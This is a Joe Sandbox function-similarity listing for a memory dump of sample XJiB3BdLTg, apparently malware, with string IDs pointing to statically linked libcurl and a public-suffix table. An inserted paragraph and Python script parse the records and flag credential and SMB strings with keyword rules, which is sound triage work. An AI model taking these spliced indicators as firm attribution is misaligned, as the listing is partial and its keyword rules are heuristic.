                                          • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                          • API String ID: 0-2839762339
                                          • Opcode ID: 3ef079b4336ea145eb3aa9cb79a7093ba7b2268290c945f793689b339cc1702f
                                          • Instruction ID: 5e75a582df7072c2b2be434fbb2019e7d73bdc5e5bc90501387ef1208a5aa8b2
                                          • Opcode Fuzzy Hash: 3ef079b4336ea145eb3aa9cb79a7093ba7b2268290c945f793689b339cc1702f
                                          • Instruction Fuzzy Hash: D202D8B1A093419FD7259F24D8457EBBFE4FF94308F04482CE98987252EB71D914CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                          • API String ID: 0-3285806060
                                          • Opcode ID: c531c701763f9d2ac22cc3f2dedc5fa91cc6d925c5de7a05ae0d9a666a3887aa
                                          • Instruction ID: c52710cd63e27c23ef46ba6b92c915afd7db46c4c07e821fa6161016b2487a85
                                          • Opcode Fuzzy Hash: c531c701763f9d2ac22cc3f2dedc5fa91cc6d925c5de7a05ae0d9a666a3887aa
                                          • Instruction Fuzzy Hash: 3CD11772A293028BD7349E38D84137ABBD1AF95304F24C93DF8DD97281EB749964D782
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$@$gfff$gfff
                                          • API String ID: 0-2633265772
                                          • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                          • Instruction ID: c940a3799172f9c5a541d1e040d7f8d27d6f975b15ffba445a9a95c79600f79c
                                          • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                          • Instruction Fuzzy Hash: 23D1C071A093068BD754DE29C48439BBFE2BFC4348F18C92DE8498B356E774DD098B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-227171996
                                          • Opcode ID: 5ffcae35da6cbda699788537eafeb440e46ced6cc2da84bd8fb6138c779f698d
                                          • Instruction ID: bc28a383146d963cea26d1925787c31de6d7962c68bdb207d2baf1ab7ea6a456
                                          • Opcode Fuzzy Hash: 5ffcae35da6cbda699788537eafeb440e46ced6cc2da84bd8fb6138c779f698d
                                          • Instruction Fuzzy Hash: 19E210B1A083428FD720DF29C09475ABFE0BB89745F158D1EE89997361E775E848CF82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$4
                                          • API String ID: 0-353776824
                                          • Opcode ID: bb159905c6c7776b817ef29572fa77689d455c4beedfeca4badc01881cd96337
                                          • Instruction ID: c69913218c82b4753d6792563e06132367b283a93b7644c364ad6835e7e0f0e1
                                          • Opcode Fuzzy Hash: bb159905c6c7776b817ef29572fa77689d455c4beedfeca4badc01881cd96337
                                          • Instruction Fuzzy Hash: BA22D2755087428FC318DF28C8806BAFBE4FF84318F158A2DE89997391D774A895CB96
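The records above are what an analyst actually works from when a sample's own code is obscured by packing: the String ID of each function is a "$"-joined list of the literals it references, and the API String ID / Opcode ID pair lets you spot functions that share a string profile while differing in code. Several of the string sets in this listing (netrc.c with machine/login/password/macdef, "SMB upload needs to know the size up front", "===BEGIN ICANN DOMAINS===" under a .DAFSA@PSL_ header) are consistent with statically linked libcurl and a public-suffix-list table, which is worth knowing before chasing them as custom C2 code. The following Python is an added example, not Joe Sandbox tooling and not part of the original report: it parses records in the layout shown above, splits the String ID field, flags strings of triage interest, and groups records by API String ID. The sample text is constructed from the page's own records with the repeated "Associated" dump lines dropped; the indicator rules are the editor's own and are assumptions to tune per hunt.

```python
"""Parse Joe Sandbox "Similarity" function records and triage their strings.

Added example (not Joe Sandbox code). Assumes only the layout visible in the
report: each record starts with a "Strings" line and carries "• Key: Value"
bullets, with String ID being a "$"-joined list of referenced strings.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

BULLET = re.compile(r"^\s*•\s*([^:]+?):\s*(.*)$")

# Constructed sample: six records trimmed from the listing above. Every value
# is copied from the report; the repeated "Associated" dump lines are omitted.
SAMPLE = r"""Strings
Memory Dump Source
• Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
Similarity
• API ID: FreeTable
• String ID: 127.0.0.1$::1$TRSKE
• API String ID: 3582546490-434011787
• Opcode ID: bfb9f78ba871207c5564ac40e4dc53719b93ee37c2a46ff331fa9b29f1a0ab6a
Strings
Similarity
• API ID:
• String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 0-2555271450
• Opcode ID: b11368bffe64c5ceff9e9ccbb1756849ec0e5d15b8b37a585393bcee835f6363
Strings
Similarity
• API ID:
• String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 0-2555271450
• Opcode ID: e7a9a6da660a4dae85150046a2aad6a3235108d187630a0df7fd35f165e9d5ee
Strings
Similarity
• API ID:
• String ID: default$login$macdef$machine$netrc.c$password
• API String ID: 0-1043775505
• Opcode ID: 271aba02c8d30738be8536a060ebd5b39c717bd0ad32e679810baa232d41ca84
Strings
Similarity
• API ID:
• String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
• API String ID: 0-4201740241
• Opcode ID: ae40ff67ecc38c2f00aa4110fce7855179716ea0b88cd6692943faf42677d51d
Strings
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: 5ffcae35da6cbda699788537eafeb440e46ced6cc2da84bd8fb6138c779f698d
"""


@dataclass
class FunctionRecord:
    fields: dict[str, str] = field(default_factory=dict)
    associated: list[str] = field(default_factory=list)

    @property
    def strings(self) -> list[str]:
        """Split the "$"-joined String ID; a bare "$" is assumed to denote a lone "$" string."""
        raw = self.fields.get("String ID", "")
        parts = [p for p in raw.split("$") if p]
        return parts or ([raw] if raw else [])


def parse_records(text: str) -> list[FunctionRecord]:
    """Each "Strings" line opens a new record; bullets become fields."""
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    for line in text.splitlines():
        if line.strip() == "Strings":
            current = FunctionRecord()
            records.append(current)
            continue
        m = BULLET.match(line)
        if m and current is not None:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Associated":          # repeated per dump, so keep a list
                current.associated.append(value)
            else:
                current.fields[key] = value
    return records


# Editor's indicator rules (assumptions, tune per hunt): label -> predicate.
RULES = {
    "credential-handling": lambda s: s.lower() in {"password", "login", "passwd", "machine", "macdef"},
    "loopback-address": lambda s: s in {"127.0.0.1", "::1"},
    "smb-transport": lambda s: s.startswith("SMB "),
    "public-suffix-list": lambda s: "ICANN DOMAINS" in s,
}


def triage(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Map Opcode ID -> sorted labels for records whose strings hit a rule."""
    hits: dict[str, list[str]] = {}
    for idx, rec in enumerate(records):
        labels = sorted({lbl for s in rec.strings for lbl, pred in RULES.items() if pred(s)})
        if labels:
            hits[rec.fields.get("Opcode ID", f"record-{idx}")] = labels
    return hits


def shared_string_profiles(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """API String IDs referenced by more than one function (same strings, different code)."""
    groups: dict[str, list[str]] = defaultdict(list)
    for rec in records:
        key = rec.fields.get("API String ID")
        if key:
            groups[key].append(rec.fields.get("Opcode ID", "?"))
    return {k: v for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for opcode_id, labels in triage(recs).items():
        print(opcode_id[:16], labels)
    print(shared_string_profiles(recs))
```

Feed it the full listing (copy the report text to a file and pass its contents to parse_records) and the grouping output shows which functions are formatting or library helpers sharing one string profile, so triage time goes to the functions whose strings are unique to the sample.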
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$4
                                          • API String ID: 0-353776824
                                          • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                          • Instruction ID: cf8a57b90ca3c152be078a83437b7a16a271b1dd72c94d35d366b41d54611ce2
                                          • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                          • Instruction Fuzzy Hash: DA120632608B118BC724CF28C4847ABBBE5FFD4318F198A7DE89957391D7359884CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H$xn--
                                          • API String ID: 0-4022323365
                                          • Opcode ID: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                          • Instruction ID: 8de9d955a73141e851830912ba7e8976797c2651269d4411240d58141a371b67
                                          • Opcode Fuzzy Hash: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                          • Instruction Fuzzy Hash: 2CE11871A487158BD718DE28D8C07AABBE2BFC4318F198A3DD99687381D774DC458B42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Downgrades to HTTP/1.1$multi.c
                                          • API String ID: 0-3089350377
                                          • Opcode ID: 16cfab9c72c07feea72fcb962143d02b4993b0a2bc776595f054dc9704713b89
                                          • Instruction ID: 5abdeb7c3fbe54e48e6694fabdde2b30e1c51552730e81e5de470edb927dc62e
                                          • Opcode Fuzzy Hash: 16cfab9c72c07feea72fcb962143d02b4993b0a2bc776595f054dc9704713b89
                                          • Instruction Fuzzy Hash: 85C12471A08701BBD714DF64D8817AAB7E1BFA5304F04852EF49887392E7B0E958CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M 0.$NT L
                                          • API String ID: 0-1807112707
                                          • Opcode ID: 43ef8f4cb8a2e48825449819b87a30711f483b322bb4026688efa03daf32e17e
                                          • Instruction ID: 97f02a8232569fed3bf3a3868736c55e20cb16e2490135ea2d4fc5cfa999bb43
                                          • Opcode Fuzzy Hash: 43ef8f4cb8a2e48825449819b87a30711f483b322bb4026688efa03daf32e17e
                                          • Instruction Fuzzy Hash: 08510774620315ABDB21CF20D8847AAB3F8BF58304F14856DFC489F642D7B5DA94CB9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M"
                                          • API String ID: 0-1954997296
                                          • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                          • Instruction ID: 0eaaa01d3fb61a77658ffa4ddde28994ebfaed222ffe25687761ee9d9098d6a3
                                          • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                          • Instruction Fuzzy Hash: 752264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \
                                          • API String ID: 0-2967466578
                                          • Opcode ID: dfcff83fd38ce01995022f358ada78865863b1af08e103272fe11dccc299c01d
                                          • Instruction ID: ea080a556c427af0bc1ed409ed1b9fb7a891f12fb92d85f07f8182d0b1db23ee
                                          • Opcode Fuzzy Hash: dfcff83fd38ce01995022f358ada78865863b1af08e103272fe11dccc299c01d
                                          • Instruction Fuzzy Hash: 2D02C46D9263166BEB20BE20DC42B2F76989F50704F054439FD99961D3F624ED388BA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                           • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
